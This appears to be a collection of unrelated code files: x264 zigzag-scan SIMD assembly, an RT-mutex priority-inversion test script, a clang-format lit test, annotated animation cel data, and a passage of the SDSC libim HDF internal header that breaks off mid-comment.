; void zigzag_sub_4x4_frame( int16_t level[16], const uint8_t *src, uint8_t *dst )
;-----------------------------------------------------------------------------
%macro ZIGZAG_SUB_4x4 2
%ifidn %1, ac
cglobal zigzag_sub_4x4%1_%2, 4,4,8
%else
cglobal zigzag_sub_4x4%1_%2, 3,3,8
%endif
movd m0, [r1+0*FENC_STRIDE]
movd m1, [r1+1*FENC_STRIDE]
movd m2, [r1+2*FENC_STRIDE]
movd m3, [r1+3*FENC_STRIDE]
movd m4, [r2+0*FDEC_STRIDE]
movd m5, [r2+1*FDEC_STRIDE]
movd m6, [r2+2*FDEC_STRIDE]
movd m7, [r2+3*FDEC_STRIDE]
movd [r2+0*FDEC_STRIDE], m0
movd [r2+1*FDEC_STRIDE], m1
movd [r2+2*FDEC_STRIDE], m2
movd [r2+3*FDEC_STRIDE], m3
punpckldq m0, m1
punpckldq m2, m3
punpckldq m4, m5
punpckldq m6, m7
punpcklqdq m0, m2
punpcklqdq m4, m6
mova m7, [pb_sub4%2]
pshufb m0, m7
pshufb m4, m7
mova m7, [hsub_mul]
punpckhbw m1, m0, m4
punpcklbw m0, m4
pmaddubsw m1, m7
pmaddubsw m0, m7
%ifidn %1, ac
movd r2d, m0
pand m0, [pb_subacmask]
%endif
mova [r0+ 0], m0
por m0, m1
pxor m2, m2
mova [r0+16], m1
pcmpeqb m0, m2
pmovmskb eax, m0
%ifidn %1, ac
mov [r3], r2w
%endif
sub eax, 0xffff
shr eax, 31
RET
%endmacro
%if HIGH_BIT_DEPTH == 0
INIT_XMM ssse3
ZIGZAG_SUB_4x4 , frame
ZIGZAG_SUB_4x4 ac, frame
ZIGZAG_SUB_4x4 , field
ZIGZAG_SUB_4x4 ac, field
INIT_XMM avx
ZIGZAG_SUB_4x4 , frame
ZIGZAG_SUB_4x4 ac, frame
ZIGZAG_SUB_4x4 , field
ZIGZAG_SUB_4x4 ac, field
%endif ; !HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH == 0
INIT_XMM xop
cglobal zigzag_scan_8x8_field, 2,3,7
lea r2, [pb_scan8field1]
%define off(m) (r2+m-pb_scan8field1)
mova m0, [r1+ 0]
mova m1, [r1+ 16]
vpperm m5, m0, m1, [off(pb_scan8field1)]
mova [r0+ 0], m5
vpperm m0, m0, m1, [off(pb_scan8field2a)]
mova m2, [r1+ 32]
mova m3, [r1+ 48]
vpperm m5, m2, m3, [off(pb_scan8field2b)]
por m5, m0
mova [r0+ 16], m5
mova m4, [off(pb_scan8field3b)]
vpperm m1, m1, m2, [off(pb_scan8field3a)]
mova m0, [r1+ 64]
vpperm m5, m3, m0, m4
por m5, m1
mova [r0+ 32], m5
; 4b, 5b are the same as pb_scan8field3b.
; 5a is the same as pb_scan8field4a.
mova m5, [off(pb_scan8field4a)]
vpperm m2, m2, m3, m5
mova m1, [r1+ 80]
vpperm m6, m0, m1, m4
por m6, m2
mova [r0+ 48], m6
vpperm m3, m3, m0, m5
mova m2, [r1+ 96]
vpperm m5, m1, m2, m4
por m5, m3
mova [r0+ 64], m5
vpperm m5, m0, m1, [off(pb_scan8field6)]
mova [r0+ 80], m5
vpperm m5, m1, m2, [off(pb_scan8field7)]
mov r2d, [r1+ 98]
mov [r0+ 90], r2d
mova [r0+ 96], m5
mova m3, [r1+112]
movd [r0+104], m3
mov r2d, [r1+108]
mova [r0+112], m3
mov [r0+112], r2d
%undef off
RET
cglobal zigzag_scan_8x8_frame, 2,3,8
lea r2, [pb_scan8frame1]
%define off(m) (r2+m-pb_scan8frame1)
mova m7, [r1+ 16]
mova m3, [r1+ 32]
vpperm m7, m7, m3, [off(pb_scan8framet1)] ; 8 9 14 15 16 17 21 22
mova m2, [r1+ 48]
vpperm m0, m3, m2, [off(pb_scan8framet2)] ; 18 19 20 23 25 31 26 30
mova m1, [r1+ 80]
mova m4, [r1+ 64]
vpperm m3, m4, m1, [off(pb_scan8framet3)] ; 32 33 37 38 40 43 44 45
vpperm m6, m0, m3, [off(pb_scan8framet4)] ; 18 23 25 31 32 38 40 45
vpperm m5, m0, m3, [off(pb_scan8framet5)] ; 19 20 26 30 33 37 43 44
vpperm m3, m2, m4, [off(pb_scan8framet6)] ; 24 27 28 29 34 35 36 39
mova m4, [r1+ 96]
vpperm m4, m1, m4, [off(pb_scan8framet7)] ; 41 42 46 47 48 49 54 55
mova m1, [r1+ 0]
vpperm m2, m1, m3, [off(pb_scan8framet8)] ; 0 1 2 7 24 28 29 36
vpperm m1, m2, m7, [off(pb_scan8frame1)] ; 0 8 1 2 9 16 24 17
mova [r0+ 0], m1
movh m0, [r1+ 6]
movhps m0, [r1+ 20] ; 3 4 5 6 10 11 12 13
vpperm m1, m0, m6, [off(pb_scan8frame2)] ; 10 3 4 11 18 25 32 40
mova [r0+ 16], m1
vpperm m1, m0, m5, [off(pb_scan8frame3)] ; 33 26 19 12 5 6 13 20
mova [r0+ 32], m1
vpperm m1, m2, m7, [off(pb_scan8frame5)] ; 28 21 14 7 15 22 29 36
mova [r0+ 64], m1
movh m0, [r1+100]
movhps m0, [r1+114] ; 50 51 52 53 57 58 59 60
vpperm m1, m5, m0, [off(pb_scan8frame6)] ; 43 50 57 58 51 44 37 30
mova [r0+ 80], m1
vpperm m1, m6, m0, [off(pb_scan8frame7)] ; 23 31 38 45 52 59 60 53
mova [r0+ 96], m1
mova m1, [r1+112]
vpperm m0, m3, m1, [off(pb_scan8framet9)] ; 27 34 35 39 56 61 62 63
vpperm m1, m0, m4, [off(pb_scan8frame4)] ; 27 34 41 48 56 49 42 35
mova [r0+ 48], m1
vpperm m1, m0, m4, [off(pb_scan8frame8)] ; 46 39 47 54 61 62 55 63
mova [r0+112], m1
%undef off
RET
%endif
;-----------------------------------------------------------------------------
; void zigzag_interleave_8x8_cavlc( int16_t *dst, int16_t *src, uint8_t *nnz )
;-----------------------------------------------------------------------------
%macro INTERLEAVE 2
mova m0, [r1+(%1*4+ 0)*SIZEOF_PIXEL]
mova m1, [r1+(%1*4+ 8)*SIZEOF_PIXEL]
mova m2, [r1+(%1*4+16)*SIZEOF_PIXEL]
mova m3, [r1+(%1*4+24)*SIZEOF_PIXEL]
TRANSPOSE4x4%2 0,1,2,3,4
mova [r0+(%1+ 0)*SIZEOF_PIXEL], m0
mova [r0+(%1+32)*SIZEOF_PIXEL], m1
mova [r0+(%1+64)*SIZEOF_PIXEL], m2
mova [r0+(%1+96)*SIZEOF_PIXEL], m3
packsswb m0, m1
ACCUM por, 6, 2, %1
ACCUM por, 7, 3, %1
ACCUM por, 5, 0, %1
%endmacro
%macro ZIGZAG_8x8_CAVLC 1
cglobal zigzag_interleave_8x8_cavlc, 3,3,8
INTERLEAVE 0, %1
INTERLEAVE 8, %1
INTERLEAVE 16, %1
INTERLEAVE 24, %1
packsswb m6, m7
packsswb m5, m6
packsswb m5, m5
pxor m0, m0
%if HIGH_BIT_DEPTH
packsswb m5, m5
%endif
pcmpeqb m5, m0
paddb m5, [pb_1]
movd r0d, m5
mov [r2+0], r0w
shr r0d, 16
mov [r2+8], r0w
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse2
ZIGZAG_8x8_CAVLC D
INIT_XMM avx
ZIGZAG_8x8_CAVLC D
%else
INIT_MMX mmx
ZIGZAG_8x8_CAVLC W
%endif
%macro INTERLEAVE_XMM 1
mova m0, [r1+%1*4+ 0]
mova m1, [r1+%1*4+16]
mova m4, [r1+%1*4+32]
mova m5, [r1+%1*4+48]
SBUTTERFLY wd, 0, 1, 6
SBUTTERFLY wd, 4, 5, 7
SBUTTERFLY wd, 0, 1, 6
SBUTTERFLY wd, 4, 5, 7
movh [r0+%1+ 0], m0
movhps [r0+%1+ 32], m0
movh [r0+%1+ 64], m1
movhps [r0+%1+ 96], m1
movh [r0+%1+ 8], m4
movhps [r0+%1+ 40], m4
movh [r0+%1+ 72], m5
movhps [r0+%1+104], m5
ACCUM por, 2, 0, %1
ACCUM por, 3, 1, %1
por m2, m4
por m3, m5
%endmacro
%if HIGH_BIT_DEPTH == 0
%macro ZIGZAG_8x8_CAVLC 0
cglobal zigzag_interleave_8x8_cavlc, 3,3,8
INTERLEAVE_XMM 0
INTERLEAVE_XMM 16
packsswb m2, m3
pxor m5, m5
packsswb m2, m2
packsswb m2, m2
pcmpeqb m5, m2
paddb m5, [pb_1]
movd r0d, m5
mov [r2+0], r0w
shr r0d, 16
mov [r2+8], r0w
RET
%endmacro
INIT_XMM sse2
ZIGZAG_8x8_CAVLC
INIT_XMM avx
ZIGZAG_8x8_CAVLC
INIT_YMM avx2
cglobal zigzag_interleave_8x8_cavlc, 3,3,6
mova m0, [r1+ 0]
mova m1, [r1+32]
mova m2, [r1+64]
mova m3, [r1+96]
mova m5, [deinterleave_shufd]
SBUTTERFLY wd, 0, 1, 4
SBUTTERFLY wd, 2, 3, 4
SBUTTERFLY wd, 0, 1, 4
SBUTTERFLY wd, 2, 3, 4
vpermd m0, m5, m0
vpermd m1, m5, m1
vpermd m2, m5, m2
vpermd m3, m5, m3
mova [r0+ 0], xm0
mova [r0+ 16], xm2
vextracti128 [r0+ 32], m0, 1
vextracti128 [r0+ 48], m2, 1
mova [r0+ 64], xm1
mova [r0+ 80], xm3
vextracti128 [r0+ 96], m1, 1
vextracti128 [r0+112], m3, 1
packsswb m0, m2 ; nnz0, nnz1
packsswb m1, m3 ; nnz2, nnz3
packsswb m0, m1 ; {nnz0,nnz2}, {nnz1,nnz3}
vpermq m0, m0, q3120 ; {nnz0,nnz1}, {nnz2,nnz3}
pxor m5, m5
pcmpeqq m0, m5
pmovmskb r0d, m0
not r0d
and r0d, 0x01010101
mov [r2+0], r0w
shr r0d, 16
mov [r2+8], r0w
RET
%endif ; !HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
INIT_ZMM avx512
cglobal zigzag_scan_4x4_frame, 2,2
mova m0, [scan_frame_avx512]
vpermd m0, m0, [r1]
mova [r0], m0
RET
cglobal zigzag_scan_4x4_field, 2,2
mova m0, [r1]
pshufd xmm1, [r1+8], q3102
mova [r0], m0
movu [r0+8], xmm1
RET
cglobal zigzag_scan_8x8_frame, 2,2
psrld m0, [scan_frame_avx512], 4
mova m1, [r1+0*64]
mova m2, [r1+1*64]
mova m3, [r1+2*64]
mova m4, [r1+3*64]
mov r1d, 0x01fe7f80
kmovd k1, r1d
kshiftrd k2, k1, 16
vpermd m5, m0, m3 ; __ __ __ __ __ __ __ __ __ __ __ __ __ __ 32 40
psrld m6, m0, 5
vpermi2d m0, m1, m2 ; 0 8 1 2 9 16 24 17 10 3 4 11 18 25 __ __
vmovdqa64 m0 {k1}, m5
mova [r0+0*64], m0
mova m5, m1
vpermt2d m1, m6, m2 ; __ 26 19 12 5 6 13 20 27 __ __ __ __ __ __ __
psrld m0, m6, 5
vpermi2d m6, m3, m4 ; 33 __ __ __ __ __ __ __ __ 34 41 48 56 49 42 35
vmovdqa32 m6 {k2}, m1
mova [r0+1*64], m6
vpermt2d m5, m0, m2 ; 28 21 14 7 15 22 29 __ __ __ __ __ __ __ __ 30
psrld m1, m0, 5
vpermi2d m0, m3, m4 ; __ __ __ __ __ __ __ 36 43 50 57 58 51 44 37 __
vmovdqa32 m5 {k1}, m0
mova [r0+2*64], m5
vpermt2d m3, m1, m4 ; __ __ 38 45 52 59 60 53 46 39 47 54 61 62 55 63
vpermd m2, m1, m2 ; 23 31 __ __ __ __ __ __ __ __ __ __ __ __ __ __
vmovdqa64 m2 {k2}, m3
mova [r0+3*64], m2
RET
cglobal zigzag_scan_8x8_field, 2,2
mova m0, [scan_field_avx512]
mova m1, [r1+0*64]
mova m2, [r1+1*64]
mova m3, [r1+2*64]
mova m4, [r1+3*64]
mov r1d, 0x3f
kmovb k1, r1d
psrld m5, m0, 5
vpermi2d m0, m1, m2
vmovdqa64 m1 {k1}, m3 ; 32 33 34 35 36 37 38 39 40 41 42 43 12 13 14 15
vpermt2d m1, m5, m2
psrld m5, 5
vmovdqa64 m2 {k1}, m4 ; 48 49 50 51 52 53 54 55 56 57 58 59 28 29 30 31
vpermt2d m2, m5, m3
psrld m5, 5
vpermt2d m3, m5, m4
mova [r0+0*64], m0
mova [r0+1*64], m1
mova [r0+2*64], m2
mova [r0+3*64], m3
RET
cglobal zigzag_interleave_8x8_cavlc, 3,3
mova m0, [cavlc_shuf_avx512]
mova m1, [r1+0*64]
mova m2, [r1+1*64]
mova m3, [r1+2*64]
mova m4, [r1+3*64]
kxnorb k1, k1, k1
por m7, m1, m2
psrld m5, m0, 5
vpermi2d m0, m1, m2 ; a0 a1 b0 b1
vpternlogd m7, m3, m4, 0xfe ; m1|m2|m3|m4
psrld m6, m5, 5
vpermi2d m5, m3, m4 ; b2 b3 a2 a3
vptestmd k0, m7, m7
vpermt2d m1, m6, m2 ; c0 c1 d0 d1
psrld m6, 5
vpermt2d m3, m6, m4 ; d2 d3 c2 c3
vshufi32x4 m2, m0, m5, q1032 ; b0 b1 b2 b3
vmovdqa32 m5 {k1}, m0 ; a0 a1 a2 a3
vshufi32x4 m4, m1, m3, q1032 ; d0 d1 d2 d3
vmovdqa32 m3 {k1}, m1 ; c0 c1 c2 c3
mova [r0+0*64], m5
mova [r0+1*64], m2
mova [r0+2*64], m3
mova [r0+3*64], m4
kmovw r1d, k0
test r1d, 0x1111
setnz [r2]
test r1d, 0x2222
setnz [r2+1]
test r1d, 0x4444
setnz [r2+8]
test r1d, 0x8888
setnz [r2+9]
RET
%else ; !HIGH_BIT_DEPTH
INIT_YMM avx512
cglobal zigzag_scan_4x4_frame, 2,2
mova m0, [scan_frame_avx512]
vpermw m0, m0, [r1]
mova [r0], m0
RET
cglobal zigzag_scan_4x4_field, 2,2
mova m0, [r1]
pshuflw xmm1, [r1+4], q3102
mova [r0], m0
movq [r0+4], xmm1
RET
INIT_ZMM avx512
cglobal zigzag_scan_8x8_frame, 2,2
psrlw m0, [scan_frame_avx512], 4
scan8_avx512:
mova m1, [r1]
mova m2, [r1+64]
psrlw m3, m0, 6
vpermi2w m0, m1, m2
vpermt2w m1, m3, m2
mova [r0], m0
mova [r0+64], m1
RET
cglobal zigzag_scan_8x8_field, 2,2
mova m0, [scan_field_avx512]
jmp scan8_avx512
cglobal zigzag_interleave_8x8_cavlc, 3,3
mova m0, [cavlc_shuf_avx512]
mova m1, [r1]
mova m2, [r1+64]
psrlw m3, m0, 6
vpermi2w m0, m1, m2
vpermt2w m1, m3, m2
kxnorb k2, k2, k2
vptestmd k0, m0, m0
vptestmd k1, m1, m1
mova [r0], m0
mova [r0+64], m1
ktestw k2, k0
setnz [r2]
setnc [r2+1]
ktestw k2, k1
setnz [r2+8]
setnc [r2+9]
RET
%endif ; !HIGH_BIT_DEPTH
| {
"language": "Assembly"
} |
#
# RT-Mutex test
#
# Op: C(ommand)/T(est)/W(ait)
# | opcode
# | | threadid: 0-7
# | | | opcode argument
# | | | |
# C: lock: 0: 0
#
# Commands
#
# opcode opcode argument
# schedother nice value
# schedfifo priority
# lock lock nr (0-7)
# locknowait lock nr (0-7)
# lockint lock nr (0-7)
# lockintnowait lock nr (0-7)
# lockcont lock nr (0-7)
# unlock lock nr (0-7)
# signal 0
# reset 0
# resetevent 0
#
# Tests / Wait
#
# opcode opcode argument
#
# prioeq priority
# priolt priority
# priogt priority
# nprioeq normal priority
# npriolt normal priority
# npriogt normal priority
# locked lock nr (0-7)
# blocked lock nr (0-7)
# blockedwake lock nr (0-7)
# unlocked lock nr (0-7)
# opcodeeq command opcode or number
# opcodelt number
# opcodegt number
# eventeq number
# eventgt number
# eventlt number
#
# 2 threads 1 lock with priority inversion
#
C: resetevent: 0: 0
W: opcodeeq: 0: 0
# Set schedulers
C: schedother: 0: 0
C: schedother: 1: 0
# T0 lock L0
C: locknowait: 0: 0
W: locked: 0: 0
# T1 lock L0
C: lockintnowait: 1: 0
W: blocked: 1: 0
# Interrupt T1
C: signal: 1: 0
W: unlocked: 1: 0
T: opcodeeq: 1: -4
# Unlock and exit
C: unlock: 0: 0
W: unlocked: 0: 0
| {
"language": "Assembly"
} |
// RUN: grep -Ev "// *[A-Z-]+:" %s | clang-format -style=none \
// RUN: | FileCheck -strict-whitespace %s
// NOTE: the grep above strips every "// WORD:" line (including these
// NOTE: lines and the CHECK line), so clang-format only sees "int i;".
// CHECK: int i;
int i;
| {
"language": "Assembly"
} |
;---------------------------------------
;
; animation cel data
;
; Layout (inferred from the fields below; confirm against the engine's
; cel decoder): a fixed header, a 4-byte terminator block, then
; run-length-encoded pixel data starting at bookf_data_a.
bookf_data::
byte swing + 0 ; animation type/flags (swing mode)
byte 0b11000000 ; flag bits -- meaning defined by the cel decoder
byte bookf_start_end - bookf_data ; offset of the terminator block
byte no_cont ; no continuation cel follows
byte 240+right,28+left,255 ; position bytes and 255 sentinel -- TODO confirm
byte 0b10000000 ; flag bits
word bookf_data_a - bookf_data ; offset of pixel data from header start
bookf_start_end:
byte 0,0,0,0 ; terminator / padding
bookf_data_a:
byte 0x04, 0x19, 0x00, 0x04, 0x00, 0x00 ; image descriptor -- verify fields
byte run,25,2 ; RLE op: count 25, value 2 (operand order per decoder)
byte 170 ; literal pixel bytes follow
byte run,3,101
byte 165
byte 229
byte run,13,101
byte 165
byte 229
byte run,3,101
byte 170
byte 170
byte run,23,85
byte 170
byte 170
byte run,23,86
byte 170
| {
"language": "Assembly"
} |
/**
** $Header: /sdsc/dev/vis/image/imtools/v3.0/libim/src/include/RCS/imhdfinternal.h,v 1.5 1995/06/29 00:32:03 bduggan Exp $
** Copyright (c) 1989-1995 San Diego Supercomputer Center (SDSC)
** a division of General Atomics, San Diego, California, USA
**
** Users and possessors of this source code are hereby granted a
** nonexclusive, royalty-free copyright and design patent license to
** use this code in individual software. License is not granted for
** commercial resale, in whole or in part, without prior written
** permission from SDSC. This source is provided "AS IS" without express
** or implied warranty of any kind.
**
** For further information contact:
** E-Mail: [email protected]
**
** Surface Mail: Information Center
** San Diego Supercomputer Center
** P.O. Box 85608
** San Diego, CA 92138-5608
** (619) 534-5000
**/
/**
** FILE
** imhdfinternal.h - HDF image file I/O include
**
** PROJECT
** libim - SDSC image manipulation library
**
** DESCRIPTION
** imhdfinternal.h contains macros and structure definitions used
** by the HDF read and write code of the image library.
**
** PUBLIC CONTENTS
** d =defined constant
** f =function
** m =defined macro
** t =typedef/struct/union
** v =variable
** ? =other
**
** IMHDFT* d tag numbers
** IMHDFNT* d MT and NT values
** IMHDFC* d color formats
**
** RED, GREEN, BLUE d RGB flags
**
** IMHDFTMPFILE d tmp file for holding stream data
**
** imHdfDD t Data Descriptor entry from an HDF file
**
** imHdfDDList v list of DDs
** imHdfDDListEnd v pointer to end of DD list
** imHdfDDCount v # of entries in DD list
**
** imHdfDDQNEntry m query number of entries in DD list
** imHdfDDQTag m query tag for a DD entry
** imHdfDDQRef m query reference number for a DD entry
** imHdfDDQDataOffset m query data offset for a DD entry
** imHdfDDQDataLength m query data length for a DD entry
** imHdfDDQNext m query next in DD list
** imHdfDDQFirst m query first in DD list
**
** imHdfClt t CLT that has been written out
**
** imHdfCltList v list of CLT's being written out
** imHdfCltListEnd v end of the CLT list
**
** imHdfCltQRefLUT m query LUT reference number for an entry
** imHdfCltQRefLD m query LD reference number for an entry
** imHdfCltQClt m query CLT pointer for an entry
**
** ReadStruct m read a structure
** WriteStruct m write a structure
** Read m read an item
** Write m write an item
** Seek m seek to a file location
** Tell m tell current file location
**
** imHdfByteOrder v data byte order
** imHdfFloatFormat v data float format
** imHdfRef v current reference number
**
** imHdfDim t dimension information
** imHdfRIG t RIG information collection
**
** PRIVATE CONTENTS
** none
**
** HISTORY
** $Log: imhdfinternal.h,v $
** Revision 1.5 1995/06/29 00:32:03 bduggan
** updated copyright
**
** Revision 1.4 1994/10/03 16:03:03 nadeau
** Updated to ANSI C and C++ compatibility by adding function prototypes.
** Minimized use of custom SDSC types (e.g., uchar vs. unsigned char)
** Changed all macros and defined constants to have names starting with IM.
** Updated copyright message.
**
** Revision 1.3 92/09/02 13:18:52 vle
** Updated copyright notice.
**
** Revision 1.2 91/10/03 13:04:37 nadeau
** Changed 'interlace' to 'interleave'.
**
** Revision 1.1 91/10/03 12:56:45 nadeau
** Initial revision
**
**/
#ifndef __IMHDFINTERNALH__
#define __IMHDFINTERNALH__ /* was missing: without it the guard never blocks re-inclusion */
/*
* CONSTANTS
* IMHDFT* - tag numbers
*
* DESCRIPTION
* Each tag in an HDF file is represented as an unsigned 16-bit number.
* The following #defines are derived from "df.h", an include file
* from the NCSA HDF library source. We can't include "df.h" itself
* here, or we'd have to distribute "df.h" without our source.
*/
#define IMHDFTNULL ((sdsc_uint16)1) /* no data */
/* Utility set */
#define IMHDFTRLE ((sdsc_uint16)11) /* run length encoding */
#define IMHDFTIMC ((sdsc_uint16)12) /* IMCOMP compression */
#define IMHDFTFID ((sdsc_uint16)100) /* File identifier */
#define IMHDFTFD ((sdsc_uint16)101) /* File description */
#define IMHDFTTID ((sdsc_uint16)102) /* Tag identifier */
#define IMHDFTTD ((sdsc_uint16)103) /* Tag descriptor */
#define IMHDFTDIL ((sdsc_uint16)104) /* data identifier label */
#define IMHDFTDIA ((sdsc_uint16)105) /* data identifier annotation */
#define IMHDFTNT ((sdsc_uint16)106) /* number type */
#define IMHDFTMT ((sdsc_uint16)107) /* machine type */
/* Raster-8 set */
#define IMHDFTID8 ((sdsc_uint16)200) /* 8-bit Image dimension */
#define IMHDFTIP8 ((sdsc_uint16)201) /* 8-bit Image palette */
#define IMHDFTRI8 ((sdsc_uint16)202) /* Raster-8 image */
#define IMHDFTCI8 ((sdsc_uint16)203) /* RLE compressed 8-bit image */
#define IMHDFTII8 ((sdsc_uint16)204) /* IMCOMP compressed 8-bit image */
/* Raster Image set */
#define IMHDFTID ((sdsc_uint16)300) /* Image DimRec */
#define IMHDFTLUT ((sdsc_uint16)301) /* Image Palette */
#define IMHDFTRI ((sdsc_uint16)302) /* Raster Image */
#define IMHDFTCI ((sdsc_uint16)303) /* Compressed Image */
#define IMHDFTRIG ((sdsc_uint16)306) /* Raster Image Group */
#define IMHDFTLD ((sdsc_uint16)307) /* Palette DimRec */
#define IMHDFTMD ((sdsc_uint16)308) /* Matte DimRec */
#define IMHDFTMA ((sdsc_uint16)309) /* Matte Data */
#define IMHDFTCCN ((sdsc_uint16)310) /* color correction */
#define IMHDFTCFM ((sdsc_uint16)311) /* color format */
#define IMHDFTAR ((sdsc_uint16)312) /* aspect ratio */
/* Composition set */
#define IMHDFTDRAW ((sdsc_uint16)400) /* Draw these images in sequence */
#define IMHDFTRUN ((sdsc_uint16)401) /* run this as a program/script */
#define IMHDFTXYP ((sdsc_uint16)500) /* x-y position */
#define IMHDFTMTO ((sdsc_uint16)501) /* machine-type override */
/* Tektronix */
#define IMHDFTT14 ((sdsc_uint16)602) /* TEK 4014 data */
#define IMHDFTT105 ((sdsc_uint16)603) /* TEK 4105 data */
/* Scientific Data set */
#define IMHDFTSDG ((sdsc_uint16)700) /* Scientific Data Group */
#define IMHDFTSDD ((sdsc_uint16)701) /* Scientific Data DimRec */
#define IMHDFTSD ((sdsc_uint16)702) /* Scientific Data */
#define IMHDFTSDS ((sdsc_uint16)703) /* Scales */
#define IMHDFTSDL ((sdsc_uint16)704) /* Labels */
#define IMHDFTSDU ((sdsc_uint16)705) /* Units */
#define IMHDFTSDF ((sdsc_uint16)706) /* Formats */
#define IMHDFTSDM ((sdsc_uint16)707) /* Max/Min */
#define IMHDFTSDC ((sdsc_uint16)708) /* Coord sys */
#define IMHDFTSDT ((sdsc_uint16)709) /* Transpose */
/*
* CONSTANTS
* IMHDFNT* - MT and NT values
*
* DESCRIPTION
* The MT (machine type) tag uses the 16-bit reference number field as
* 4 4-bit values broken down in the order (high to low):
*
* unsigned char
* unsigned int
* float
* double
*
* The unsigned char 4-bit field has as a value one of the char class
* codes. Likewise for the unsigned int, float, and double. Class
* code constants have names starting with IMHDFNT* and are the same as
* used by the NT tag.
*
* The NT tag has 4 8-bit values associated with it, one of which
* specifies the type being specified (unsigned int, int, etc), and another
* the class code representing the description (it's a VAX float, etc).
*/
#define IMHDFNTVERSION 1 /* current version of NT info */
/* Type codes */
#define IMHDFNTUINT 1
#define IMHDFNTINT 2
#define IMHDFNTUCHAR 3
#define IMHDFNTCHAR 4
#define IMHDFNTFLOAT 5
#define IMHDFNTDOUBLE 6
/* Class codes for unsigned int and int. */
#define IMHDFINTMBO 1 /* Motorola byte order 2's compl */
#define IMHDFINTVBO 2 /* Vax byte order 2's compl */
#define IMHDFINTIBO 4 /* Intel byte order 2's compl */
/* Class codes for float and double. */
#define IMHDFFLOATIEEE 1 /* IEEE format */
#define IMHDFFLOATVAX 2 /* Vax format */
#define IMHDFFLOATCRAY 3 /* Cray format */
#define IMHDFFLOATPC 4 /* PC floats - flipped IEEE */
/* Class codes for uchar and char. */
#define IMHDFCHARBYTE 0 /* bitwise/numeric field */
#define IMHDFCHARASCII 1 /* ASCII */
#define IMHDFCHAREBCDIC 5 /* EBCDIC */
/*
* CONSTANTS
* IMHDFC* - color formats
*
* DESCRIPTION
* Color formats are described by character strings in the data for
* the CFM tag. Internally we treat them as the following integer
* constants for quicker comparisons.
*/
#define IMHDFCVALUE 0 /* Pseudo-Color */
#define IMHDFCRGB 1 /* RGB */
#define IMHDFCXYZ 2 /* CIE XYZ */
#define IMHDFCHSV 3 /* Hue-Saturation-Value */
#define IMHDFCHSI 4 /* Hue-Saturation-Intensity */
#define IMHDFCSPECTRAL 5 /* Spectral sampling */
/*
* CONSTANTS
* RED, GREEN, BLUE - RGB flags
*
* DESCRIPTION
* These values are used during run-length encoding and decoding of
* RGB images in order to keep track of the channel value currently
* being handled.
*/
#define BLUE 0
#define GREEN 1
#define RED 2
/*
* DD List Management
*/
/*
* TYPEDEF & STRUCT
* imHdfDD - Data Descriptor entry from an HDF file
*
* DESCRIPTION
* An imHdfDD describes one piece of data in an HDF file. When an HDF
* table of contents is read in, a list of all of the data items in
* the file is made.
*/
typedef struct imHdfDD
{
unsigned int dd_tag; /* Tag number */
unsigned int dd_ref; /* Reference number (see imHdfDDQRef) */
long dd_dataOffset; /* File offset to data */
unsigned int dd_dataLength; /* Length (in bytes) of data */
struct imHdfDD *dd_next; /* Next in linked list */
} imHdfDD;
/*
* GLOBALS
* imHdfDDList - list of DDs
* imHdfDDListEnd - pointer to end of DD list
* imHdfDDCount - # of entries in DD list
*/
extern imHdfDD *imHdfDDList; /* List of DD's */
extern imHdfDD *imHdfDDListEnd; /* Pointer to end of DD list */
extern int imHdfDDCount; /* # of DD's in list */
/*
* MACROS
* imHdfDDQNEntry - query number of entries in DD list
* imHdfDDQTag - query tag for a DD entry
* imHdfDDQRef - query reference number for a DD entry
* imHdfDDQDataOffset - query data offset for a DD entry
* imHdfDDQDataLength - query data length for a DD entry
* imHdfDDQNext - query next in DD list
* imHdfDDQFirst - query first in DD list
*
* DESCRIPTION
* Query stuff from a DD list.
*/
#define imHdfDDQNEntry() (imHdfDDCount)
#define imHdfDDQTag(pDD) (pDD->dd_tag)
#define imHdfDDQRef(pDD) (pDD->dd_ref)
#define imHdfDDQDataOffset(pDD) (pDD->dd_dataOffset)
#define imHdfDDQDataLength(pDD) (pDD->dd_dataLength)
#define imHdfDDQNext(pDD) (pDD->dd_next)
#define imHdfDDQFirst() (imHdfDDList)
/*
* CLT List Management
*/
/*
* TYPEDEF & STRUCT
* imHdfClt - CLT that has been written out
*
* DESCRIPTION
* As CLT's are written out, their pointer, and LD and LUT tag/ref's
* are saved to possibly be included in a future RIG.
*/
typedef struct imHdfClt
{
ImClt *clt_clt; /* CLT pointer */
unsigned int clt_refLUT; /* LUT's ref */
unsigned int clt_refLD; /* LD's ref */
struct imHdfClt *clt_next; /* Next in list */
} imHdfClt;
/*
* GLOBALS
* imHdfCltList - list of CLT's being written out
* imHdfCltListEnd - end of the CLT list
*/
extern imHdfClt *imHdfCltList;
extern imHdfClt *imHdfCltListEnd;
/*
* MACROS
* imHdfCltQRefLUT - query LUT reference number for an entry
* imHdfCltQRefLD - query LD reference number for an entry
* imHdfCltQClt - query CLT pointer for an entry
*
* DESCRIPTION
* Query stuff from an HDF CLT.
*/
#define imHdfCltQRefLUT(pClt) (pClt->clt_refLUT)
#define imHdfCltQRefLD(pClt) (pClt->clt_refLD)
#define imHdfCltQClt(pClt) (pClt->clt_clt)
/*
* MACROS
* ReadStruct - read a structure
* WriteStruct - write a structure
* Read - read an item
* Write - write an item
* Seek - seek to a file location
* Tell - tell current file location
*
* DESCRIPTION
* These macros just cover up the standard I/O calls and return
* a fatal error code. They assume the local variables 'ioType', 'fd',
* and 'fp' exist.
*/
#define ReadStruct(ptr,bin) \
if ( ImBinReadStruct( ioType, fd, fp, (ptr), (bin) ) == -1 ) \
ImReturnBinError( );
#define WriteStruct(ptr,bin) \
if ( ImBinWriteStruct( ioType, fd, fp, (ptr), (bin) ) == -1 ) \
ImReturnBinError( );
#define Read(ptr,type,nbytes,num) \
if ( ImBinRead( ioType, fd, fp, (ptr), (type), (nbytes), (num) )== -1)\
ImReturnBinError( );
#define Write(ptr,type,nbytes,num) \
if ( ImBinWrite( ioType, fd, fp, (ptr), (type), (nbytes), (num) )== -1)\
ImReturnBinError( );
#define Seek(offset) \
ImSeek( ioType, fd, fp, (offset), 0 );
#define Tell() \
ImTell( ioType, fd, fp );
/*
* GLOBALS
* imHdfByteOrder - data byte order
* imHdfFloatFormat - data float format
* imHdfRef - current reference number
*/
extern int imHdfByteOrder; /* Default byte order */
extern int imHdfFloatFormat; /* Default float format */
extern sdsc_uint16 imHdfRef; /* Current reference number */
/*
* TYPEDEF & STRUCT
* imHdfDim - dimension information
*
* DESCRIPTION
* The ID, LD, and MD tags each use the same structure in an HDF file.
